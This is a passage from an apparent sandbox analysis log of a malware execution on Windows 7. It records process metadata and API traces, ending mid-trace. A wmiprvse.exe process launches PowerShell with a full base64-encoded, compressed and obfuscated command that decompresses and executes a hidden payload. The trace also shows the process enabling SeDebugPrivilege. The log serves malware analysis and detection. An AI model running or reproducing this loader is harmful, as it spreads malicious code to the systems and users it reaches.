(This=0x7fefec05380, pv=0x6a08c40) [0237.250] IMalloc:Free (This=0x7fefec05380, pv=0x6860ee0) [0237.250] IMalloc:Free (This=0x7fefec05380, pv=0x6860d90) [0237.250] IMalloc:Free (This=0x7fefec05380, pv=0x68bf850) [0237.250] IMalloc:Free (This=0x7fefec05380, pv=0x68d8d80) [0237.250] IMalloc:Free (This=0x7fefec05380, pv=0xaee0080) [0237.278] WaitForSingleObject (hHandle=0xb58, dwMilliseconds=0x12c) returned 0x0 [0237.295] CloseHandle (hObject=0xb58) returned 1 [0237.296] IMalloc:Free (This=0x7fefec05380, pv=0xafa6780) [0237.296] IMalloc:Free (This=0x7fefec05380, pv=0xafa5b50) [0237.296] IMalloc:Free (This=0x7fefec05380, pv=0xafa5f60) [0237.296] IMalloc:Free (This=0x7fefec05380, pv=0xafa6370) [0237.296] DllDebugObjectRPCHook () returned 0x1 [0237.298] DllCanUnloadNow () returned 0x0 [0237.298] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0237.298] FreeLibrary (hLibModule=0x7fefd710000) returned 1 [0237.299] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0237.299] free (_Block=0x9179d90) [0237.301] free (_Block=0x2512630) [0237.301] FreeLibrary (hLibModule=0x7fee2ce0000) returned 1 [0237.612] __clean_type_info_names_internal () returned 0x0 Thread: id = 20 os_tid = 0xa70 Thread: id = 21 os_tid = 0xa74 Thread: id = 22 os_tid = 0xa7c Thread: id = 69 os_tid = 0xac0 Thread: id = 116 os_tid = 0x768 Thread: id = 234 os_tid = 0x7dc Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x12a45000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x8e8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d2ee" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 23 os_tid = 0xa4c Thread: id = 24 os_tid = 0xa48 Thread: id = 25 os_tid = 0xa40 Thread: id = 26 os_tid = 0xa3c Thread: id = 27 os_tid = 0xa38 Thread: id = 28 os_tid = 0xa34 Thread: id = 29 os_tid = 0xa30 Thread: id = 30 os_tid = 0xa2c Thread: id = 31 os_tid = 0xa28 Thread: id = 32 os_tid = 0xa10 Thread: id = 33 os_tid = 0x5c8 Thread: id = 34 os_tid = 0x414 Thread: id = 35 os_tid = 0x230 Thread: id = 36 os_tid = 0x408 Thread: id = 37 os_tid = 0x7dc Thread: id = 38 os_tid = 0x798 Thread: id = 39 os_tid = 0x794 Thread: id = 40 os_tid = 0x764 Thread: id = 41 os_tid = 0x760 Thread: id = 42 os_tid = 0x758 Thread: id = 43 os_tid = 0x730 Thread: id = 44 os_tid = 0x728 Thread: id = 45 os_tid = 0x724 Thread: id = 46 os_tid = 0x71c Thread: id = 47 os_tid = 0x70c Thread: id = 48 os_tid = 0x700 Thread: id = 49 os_tid = 0x6fc Thread: id = 50 os_tid = 0x6f8 Thread: id = 51 os_tid = 0x6e4 Thread: id = 52 os_tid = 0x4c0 Thread: id = 53 os_tid = 0x480 Thread: id = 54 os_tid = 0x474 Thread: id = 55 os_tid = 0x470 Thread: id = 56 os_tid = 0x450 Thread: id = 57 os_tid = 0x444 Thread: id = 58 os_tid = 0x294 Thread: id = 59 os_tid = 0x218 Thread: id = 60 os_tid = 0x3fc Thread: id = 61 os_tid = 0x3f4 Thread: id = 62 os_tid = 0x3e8 Thread: id = 63 os_tid = 0x39c Thread: id = 64 os_tid = 0x390 Thread: id = 65 os_tid = 0x38c Thread: id = 66 os_tid = 0x388 Thread: id = 67 os_tid = 0x37c Thread: id = 68 os_tid = 0x374 Thread: id = 70 os_tid = 0xac4 Thread: id = 79 os_tid = 0xad0 Thread: id = 80 os_tid = 0xad4 Thread: id = 81 os_tid = 0xad8 Thread: id = 90 os_tid = 0xb00 Thread: id = 95 os_tid = 0xb5c Thread: id = 98 os_tid = 0xb88 Thread: id = 99 os_tid = 0xb8c Thread: id = 104 os_tid = 0xbbc Thread: id = 105 os_tid = 0xbc0 Thread: id = 106 os_tid = 0xbc4 Thread: id = 107 os_tid = 0xbc8 Thread: id = 108 os_tid = 0xbcc Thread: id = 109 os_tid = 0xbd0 Thread: id = 110 os_tid = 0xbd4 Thread: id = 111 os_tid = 0xbd8 Thread: id = 112 os_tid = 0xbec Thread: id = 113 os_tid = 0x80c Thread: id = 118 os_tid = 0x894 Thread: id = 211 os_tid = 0x330 Thread: id = 212 os_tid = 0x70c Thread: id = 213 os_tid = 0x71c Thread: id = 214 os_tid = 0x77c Thread: id = 215 os_tid = 0xb38 Thread: id = 216 os_tid = 0x310 Thread: id = 219 os_tid = 0x60c Thread: id = 225 os_tid = 0x4b4 Thread: id = 235 os_tid = 0x6a8 Thread: id = 279 os_tid = 0xbc8 Thread: id = 280 os_tid = 0xbc4 Process: id = "3" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x5452e000" os_pid = "0x858" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x370" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d2ee" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 71 os_tid = 0xa44 Thread: id = 72 os_tid = 0x878 Thread: id = 73 os_tid = 0x874 Thread: id = 74 os_tid = 0x870 Thread: id = 75 os_tid = 0x86c Thread: id = 76 os_tid = 0x868 Thread: id = 77 os_tid = 0x860 Thread: id = 78 os_tid = 0x85c Thread: id = 117 os_tid = 0x3b4 Thread: id = 281 os_tid = 0xbbc Thread: id = 282 os_tid = 0x218 Thread: id = 289 os_tid = 0xa1c Process: id = "4" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x18a41000" os_pid = "0xadc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x370" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0005cfd4" [0xc000000f] Thread: id = 82 os_tid = 0xae0 Thread: id = 83 os_tid = 0xae4 Thread: id = 84 os_tid = 0xae8 Thread: id = 85 os_tid = 0xaec Thread: id = 86 os_tid = 0xaf0 Thread: id = 87 os_tid = 0xaf4 Thread: id = 88 os_tid = 0xaf8 Thread: id = 89 os_tid = 0xafc Thread: id = 217 os_tid = 0x500 Thread: id = 218 os_tid = 0x5bc Thread: id = 283 os_tid = 0x5c8 Process: id = "5" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x2b36f000" os_pid = "0xb08" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xadc" cmd_line = "powershell -e KAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIAAgAGkATwAuAHMAVABSAEUAYQBNAFIAZQBhAGQAZQBSACgAKAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIABJAE8ALgBjAG8AbQBwAHIARQBTAHMAaQBPAE4ALgBEAEUAZgBsAGEAVABFAHMAdAByAGUAYQBNACgAIABbAGkAbwAuAG0ARQBNAG8AUgBZAFMAdAByAGUAYQBNAF0AIABbAEMAbwBuAFYAZQByAFQAXQA6ADoAZgBSAE8ATQBCAEEAcwBlADYANABzAFQAcgBJAE4AZwAoACgAJwBYAFoASgBSAGIANQBzACcAKwAnAHcAJwArACcARQAnACsAJwBNAGUALwAnACsAJwBDAGcAJwArACcAOQBJAFQAcABRAEIAaQA4AFIARABWACcAKwAnADQAJwArACcAVABVAGMAMQBoAFEAWAAnACsAJwByAGEAaABGACcAKwAnAFEAVwBoACcAKwAnAFMAaABWAHgARABuACcAKwAnAEMAZwBOACcAKwAnAHMAJwArACcASQBPACcAKwAnAHoAaAAnACsAJwBUAGwAdQAnACsAJwA4AC8AWgAyAGsAYQB0ACcAKwAnAEgANgAnACsAJwAzAGYALwBjAC8AMwBPACcAKwAnADcAJwArACcAdgAnACsAJwBWAGMAJwArACcANQBkAEIAJwArACcAQQBtACcAKwAnAEYATQB1ACcAKwAnAGkAVgBBAGIAcQBBAGoAawAnACsAJwBUAHQAJwArACcAawBZAEUANABRAEMAegBTAGUAMwBCADIAUQBhAGUAYwBIAGEAbgArAEwAdQAxAFgAUABVAGUAagAnACsAJwBJAEwAUgBpAEYAegAnACsAJwBCAEsAawAxAFgAcQAnACsAJwA0ACcAKwAnAEQANAAnACsAJwBJACcAKwAnAGUAbABjACcAKwAnAEsAeABVAGsAJwArACcAbwB5AFgAbQBsAFUAUABwAE0AJwArACcAdgBnAFIAJwArACcAawA4ACcAKwAnAEoAbwBXADIAJwArACcAQgAnACsAJwBjAEgAMwB1AHoAJwArACcAWgAnACsAJwA0AGUARwBWACcAKwAnAHIAJwArACcATwBlAEoAcAAnACsAJwBHAEsAVQB0AG0ARABqAEQAegA2AGoAZQB2AHAATwBDACcAKwAnADQAOQAnACsAJwBHACcAKwAnADAAcwB0AGIAWQBZAEcAOQB3ACcAKwAnADcARgBEADQAbwBnACcAKwAnACsAYQBiAHgAQgBzAEQALwA4ACcAKwAnAHAAWgBiAEcAJwArACcAagAnACsAJwA0AEUASwBPACcAKwAnAEcAdgAnACsAJwBkACcAKwAnADgAdwBsACcAKwAnAEgASgBmADQARwBWAFUAYgByAFMAaQB0AHQAVQAnACsAJwBGAFcAJwArACcAUwBQAEwAJwArACcAYgB2AGgARQAyACcAKwAnAC8AJwArACcAawA2ACcAKwAnAE8AMwBIAHEAcABIAGkAYwAnACsAJwAvAFAAZAA1AG0AJwArACcAZABBAC8ATgA5AEQAegAvAFcATQBQAEoAQgA1ACcAKwAnADUATgBiADUAOABqAGwAUABZADMASwAnACsAJwBnAFkASgBLAFMAVwBqACcAKwAnAG0AeQBLADIAJwArACcAawBLAFcAZQAnACsAJwBqAEUARAAnACsAJwBnAG4AdgA3ACcAKwAnAEUAVQB1AE8AMQBwAFEASwBHAE8AUwAnACsAJwBXACcAKwAnAHAAJwArACcATQAwAFMAYQA0ACcAKwAnAEsAJwArACcAZgAnACsAJwB3AEcAcwBBAEoATAAnACsAJwBZAFIAVABIAGQASAArADIAcwBkAHUASwBhACcAKwAnADkANwBnAGcAVAAyAFQAeABuAHIARQBnAFAAcAAnACsAJwA2ACcAKwAnAFEAUgBGAGMAbgBGAFcAdABuACcAKwAnADcAJwArACcAcgBwAFkAbgBvAEIAbQBoAGMATwBGADgAJwArACcAMgBaACcAKwAnADUAZgB0ACcAKwAnAGIAagBuAC8AUAByACcAKwAnAFUAdgB4AEUARwB0ACcAKwAnAEgATABhAHIAJwArACcAKwAyACcAKwAnAFkAVABmACcAKwAnACsAJwArACcAaQAnACsAJwAvAFAAVwAwAGIANQAnACsAJwA1AEQAVwAnACsAJwBYAEcAawBqAHcAJwArACcAbQBEAEYASwBnAGUAVgBHAFEAYQBGAE0AJwArACcANwBzADEAbQBLACcAKwAnADIAdAB0AG8AZgBMAG0AeAAnACsAJwBmAG8AJwArACcAKwBpACcAKwAnADAAYQAzAGoATgBlACcAKwAnAGkARQBYACsAJwArACcAMgBaACcAKwAnAE8AKwBlAE4AbQBHAFMASABIADAARwA3AGMAVABBAGgAbQBKACcAKwAnAGgAVQBLACcAKwAnAFEARABRAGsAawBRADcAKwArAEkAdQB1AGwAeABZAHAAVgBsADcAdgBsAHoAYwBSADYAQwAwAHMAJwArACcANgAnACsAJwBaAFcAawBGADkALwBGAEkAbgArAEEAJwArACcAZwA9AD0AJwApACAAKQAsAFsASQBvAC4AYwBvAG0AUABSAGUAUwBTAGkAbwBuAC4AYwBPAE0AUABSAGUAcwBzAGkATwBOAE0AbwBEAEUAXQA6ADoAZABFAGMAbwBNAHAAUgBFAFMAcwAgACkAIAApACAALABbAHQAZQBYAHQALgBlAG4AQwBPAGQASQBOAEcAXQA6ADoAYQBTAEMAaQBpACkAKQAuAHIARQBhAGQAVABPAEUAbgBkACgAIAApACAAfAAmACgAIAAkAFYARQByAEIATwBTAEUAcAByAGUARgBFAFIAZQBOAGMAZQAuAHQATwBTAFQAcgBpAE4ARwAoACkAWwAxACwAMwBdACsAJwBYACcALQBqAG8ASQBuACcAJwApAA==" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "64" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 91 os_tid = 0xb0c [0078.167] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0078.947] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0078.948] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0078.948] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0078.948] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0080.061] GetVersionExW (in: lpVersionInformation=0xedc00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedc00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0080.064] GetVersionExW (in: lpVersionInformation=0xedc00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedc00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0080.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.111] GetVersionExW (in: lpVersionInformation=0xed970*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xed970*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0080.111] SetErrorMode (uMode=0x1) returned 0x1 [0080.112] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xedad0 | out: lpFileInformation=0xedad0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0080.113] SetErrorMode (uMode=0x1) returned 0x1 [0080.151] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xedd40 | out: lpdwHandle=0xedd40) returned 0x94c [0080.159] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2a88768 | out: lpData=0x2a88768) returned 1 [0080.162] VerQueryValueW (in: pBlock=0x2a88768, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedcb8, puLen=0xedcb0 | out: lplpBuffer=0xedcb8*=0x2a88804, puLen=0xedcb0) returned 1 [0080.165] lstrlenW (lpString="䅁") returned 1 [0080.195] VerQueryValueW (in: pBlock=0x2a88768, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xedc28, puLen=0xedc20 | out: lplpBuffer=0xedc28*=0x2a888e0, puLen=0xedc20) returned 1 [0080.195] lstrlenW (lpString="Microsoft Corporation") returned 21 [0080.197] CoTaskMemAlloc (cb=0x2e) returned 0x24e720 [0080.197] lstrcpyW (in: lpString1=0x24e720, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0080.199] CoTaskMemFree (pv=0x24e720) [0080.199] VerQueryValueW (in: pBlock=0x2a88768, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xedc28, puLen=0xedc20 | out: lplpBuffer=0xedc28*=0x2a88934, puLen=0xedc20) returned 1 [0080.199] lstrlenW (lpString="System.Management.Automation") returned 28 [0080.199] CoTaskMemAlloc (cb=0x3c) returned 0x1cdf20 [0080.199] lstrcpyW (in: lpString1=0x1cdf20, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0080.199] CoTaskMemFree (pv=0x1cdf20) [0080.199] VerQueryValueW (in: pBlock=0x2a88768, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xedc28, puLen=0xedc20 | out: lplpBuffer=0xedc28*=0x2a88990, puLen=0xedc20) returned 1 [0080.199] lstrlenW (lpString="6.1.7601.17514") returned 14 [0080.199] CoTaskMemAlloc (cb=0x20) returned 0x1b263a80 [0080.199] lstrcpyW (in: lpString1=0x1b263a80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0080.199] CoTaskMemFree (pv=0x1b263a80) [0080.199] VerQueryValueW (in: pBlock=0x2a88768, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xedc28, puLen=0xedc20 | out: lplpBuffer=0xedc28*=0x2a889d0, puLen=0xedc20) returned 1 [0080.199] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0080.199] CoTaskMemAlloc (cb=0x44) returned 0x1cdf20 [0080.199] lstrcpyW (in: lpString1=0x1cdf20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0080.199] CoTaskMemFree (pv=0x1cdf20) [0080.199] VerQueryValueW (in: pBlock=0x2a88768, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xedc28, puLen=0xedc20 | out: lplpBuffer=0xedc28*=0x2a88a38, puLen=0xedc20) returned 1 [0080.199] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0080.199] CoTaskMemAlloc (cb=0x76) returned 0x1c8110 [0080.199] lstrcpyW (in: lpString1=0x1c8110, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0080.199] CoTaskMemFree (pv=0x1c8110) [0080.199] VerQueryValueW (in: pBlock=0x2a88768, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xedc28, puLen=0xedc20 | out: lplpBuffer=0xedc28*=0x2a88ad4, puLen=0xedc20) returned 1 [0080.199] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0080.199] CoTaskMemAlloc (cb=0x44) returned 0x1cdf20 [0080.199] lstrcpyW (in: lpString1=0x1cdf20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0080.199] CoTaskMemFree (pv=0x1cdf20) [0080.199] VerQueryValueW (in: pBlock=0x2a88768, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xedc28, puLen=0xedc20 | out: lplpBuffer=0xedc28*=0x2a88b38, puLen=0xedc20) returned 1 [0080.200] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0080.200] CoTaskMemAlloc (cb=0x58) returned 0x194bb0 [0080.200] lstrcpyW (in: lpString1=0x194bb0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0080.200] CoTaskMemFree (pv=0x194bb0) [0080.200] VerQueryValueW (in: pBlock=0x2a88768, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xedc28, puLen=0xedc20 | out: lplpBuffer=0xedc28*=0x2a88bb4, puLen=0xedc20) returned 1 [0080.200] lstrlenW (lpString="6.1.7601.17514") returned 14 [0080.200] CoTaskMemAlloc (cb=0x20) returned 0x1b263a80 [0080.200] lstrcpyW (in: lpString1=0x1b263a80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0080.200] CoTaskMemFree (pv=0x1b263a80) [0080.200] VerQueryValueW (in: pBlock=0x2a88768, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xedc28, puLen=0xedc20 | out: lplpBuffer=0xedc28*=0x2a8885c, puLen=0xedc20) returned 1 [0080.200] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0080.200] CoTaskMemAlloc (cb=0x66) returned 0x1c7020 [0080.200] lstrcpyW (in: lpString1=0x1c7020, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0080.200] CoTaskMemFree (pv=0x1c7020) [0080.200] VerQueryValueW (in: pBlock=0x2a88768, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xedc28, puLen=0xedc20 | out: lplpBuffer=0xedc28*=0x0, puLen=0xedc20) returned 0 [0080.200] VerQueryValueW (in: pBlock=0x2a88768, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xedc28, puLen=0xedc20 | out: lplpBuffer=0xedc28*=0x0, puLen=0xedc20) returned 0 [0080.200] VerQueryValueW (in: pBlock=0x2a88768, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xedc28, puLen=0xedc20 | out: lplpBuffer=0xedc28*=0x0, puLen=0xedc20) returned 0 [0080.200] VerQueryValueW (in: pBlock=0x2a88768, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedbf8, puLen=0xedbf0 | out: lplpBuffer=0xedbf8*=0x2a88804, puLen=0xedbf0) returned 1 [0080.230] CoTaskMemAlloc (cb=0x204) returned 0x1cf1c0 [0080.231] VerLanguageNameW (in: wLang=0x0, szLang=0x1cf1c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0080.232] CoTaskMemFree (pv=0x1cf1c0) [0080.232] VerQueryValueW (in: pBlock=0x2a88768, lpSubBlock="\\", lplpBuffer=0xedc48, puLen=0xedc40 | out: lplpBuffer=0xedc48*=0x2a88790, puLen=0xedc40) returned 1 [0080.242] GetCurrentProcessId () returned 0xb08 [0080.301] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xecb70 | out: lpLuid=0xecb70*(LowPart=0x14, HighPart=0)) returned 1 [0080.303] GetCurrentProcess () returned 0xffffffffffffffff [0080.304] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xecb90 | out: TokenHandle=0xecb90*=0x2f0) returned 1 [0080.305] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2a8bfe0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0080.317] CloseHandle (hObject=0x2f0) returned 1 [0080.324] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb08) returned 0x2f0 [0080.353] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2a8c048, cb=0x200, lpcbNeeded=0xedba8 | out: lphModule=0x2a8c048, lpcbNeeded=0xedba8) returned 1 [0080.356] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13ffd0000, lpmodinfo=0x2a8c2b8, cb=0x18 | out: lpmodinfo=0x2a8c2b8*(lpBaseOfDll=0x13ffd0000, SizeOfImage=0x77000, EntryPoint=0x13ffdc63c)) returned 1 [0080.357] CoTaskMemAlloc (cb=0x804) returned 0x1b2657e0 [0080.357] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13ffd0000, lpBaseName=0x1b2657e0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0080.358] CoTaskMemFree (pv=0x1b2657e0) [0080.359] 